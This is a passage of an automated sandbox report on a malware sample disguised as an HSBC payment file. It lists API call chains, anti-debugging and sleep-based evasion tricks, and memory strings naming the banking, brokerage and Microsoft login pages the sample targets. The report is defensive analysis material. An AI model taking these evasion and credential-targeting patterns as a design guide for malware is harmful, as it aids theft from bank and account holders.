            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007248D7
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007A5376
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00743187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00743187
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeAPI/Special instruction interceptor: Address: 1F83224
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\sdchange.exeWindow / User API: threadDelayed 9808Jump to behavior
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102193
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeAPI coverage: 4.4 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\sdchange.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\sdchange.exe TID: 6952Thread sleep count: 165 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exe TID: 6952Thread sleep time: -330000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exe TID: 6952Thread sleep count: 9808 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exe TID: 6952Thread sleep time: -19616000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe TID: 5372Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe TID: 5372Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0078445A
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078C6D1 FindFirstFileW,FindClose,0_2_0078C6D1
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0078C75C
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0078EF95
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0078F0F2
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0078F3F3
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007837EF
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00783B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00783B12
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0078BCBC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E1C0D0 FindFirstFileW,FindNextFileW,FindClose,5_2_02E1C0D0
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007249A0
            Source: 1n436243.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 1n436243.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 1n436243.5.drBinary or memory string: discord.comVMware20,11696487552f
            Source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: merica.comVMware20,11696487552|UE
            Source: 1n436243.5.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers - COM.HKVMware20,11696487552
            Source: EqOUZfSIzU.exe, 00000006.00000002.3955665444.000000000112F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: East & CentralVMware20,11696487552
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anara Transaction PasswordVMware20,11696487552x
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: on-EU EuropeVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swordVMware20,11696487552}
            Source: 1n436243.5.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w.interactivebrokers.comVMware20,11696487552}
            Source: 1n436243.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487
            Source: 1n436243.5.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 1n436243.5.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: firefox.exe, 00000009.00000002.2677038200.000002E25220D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
            Source: 1n436243.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 1n436243.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552~
            Source: 1n436243.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 1n436243.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 1n436243.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 1n436243.5.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 1n436243.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 1n436243.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 1n436243.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 1n436243.5.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 1n436243.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 1n436243.5.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 1n436243.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 1n436243.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 1n436243.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeAPI call chain: ExitProcess graph end nodegraph_0-101384
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004173B3 LdrLoadDll,2_2_004173B3
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00793F09 BlockInput,0_2_00793F09
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00723B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00723B3A
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00755A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00755A7C
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00724B37 LoadLibraryA,GetProcAddress,0_2_00724B37
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_01F834F0 mov eax, dword ptr fs:[00000030h]0_2_01F834F0
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_01F83490 mov eax, dword ptr fs:[00000030h]0_2_01F83490
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_01F81E70 mov eax, dword ptr fs:[00000030h]0_2_01F81E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
